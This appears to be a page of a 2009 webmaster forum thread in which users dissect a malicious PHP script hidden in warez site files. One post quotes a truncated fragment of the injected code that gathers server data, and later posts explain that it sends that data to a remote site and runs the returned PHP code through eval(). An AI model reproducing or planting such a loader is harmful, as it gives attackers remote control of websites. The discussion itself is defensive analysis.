Results 11 to 17 of 17
-
4th Oct 2009, 06:10 AM#11
BannedWebsite's:
Dev-Security.netHi mate this part of the code
Is basically showingCode:<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER
your host name , servername, requested url,referrrer , user agent, the filename stuff like that it can be harmful depending on what it is beign used for
its encodeing the text in base64 encrypted using functions decalred by the alaphabet characters of A-I
what it does is sends ppl to a false php page and redirects them to another one
this attack is being used on TONS of websites
as welll as this same script is being used in the public
http://pastebin.com/m6649b7c3
also read this
http://wordpress.org/support/topic/220523
-
4th Oct 2009, 06:43 AM#12
Member
anyway to stop it?
-
4th Oct 2009, 06:45 AM#13
BannedWebsite's:
Dev-Security.nethave you tried deleting it? also chmode the file to 600 for no execution try that also on the site i think it showed you how to stop it
-
4th Oct 2009, 06:52 AM#14
Banned
found this on chillwarez when i bought it there was 2 randomly numbed php files and a .htaccess with the numbered files in it this was in every folder with images
EDIT: lol that pastebin link was mine
Originally Posted by William Palmer
-
4th Oct 2009, 07:14 AM#15
BannedWebsite's:
Dev-Security.netBAAHAHAHAH nice warezdemon i just done a quick google for those scripts
lol
-
4th Oct 2009, 02:48 PM#16
Banned
meh warezwitch has been struck to i just noticed
-
4th Oct 2009, 03:02 PM#17
Respected Developer
I reversed this script for demon some time back.
What it does:
- Send some site info to website X
- Retrieve php code from website X
- eval() (execute) the retrieved php code
Edit: so basically this can be used as a remote virus or automated shell
Register To ReplySponsored Links
Thread Information
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)
Similar Threads
-
Hacker on a roll!!
By nYXem in forum General DiscussionReplies: 19Last Post: 25th Oct 2011, 02:56 PM -
hacker on KWWH
By kuzukuzu in forum General DiscussionReplies: 19Last Post: 6th Jun 2011, 09:42 AM -
Need a Hacker.
By -saMmy- in forum Completed TransactionsReplies: 10Last Post: 13th Sep 2010, 06:45 PM -
[Buying] need a hacker
By downloadmaster in forum Completed TransactionsReplies: 6Last Post: 12th Feb 2010, 06:25 PM -
Any pro hacker here?
By anti-human in forum General DiscussionReplies: 5Last Post: 5th Sep 2009, 03:27 PM
Staff Online
themaPoster - post to forums and...
Version 5.40 released. Open older version (or...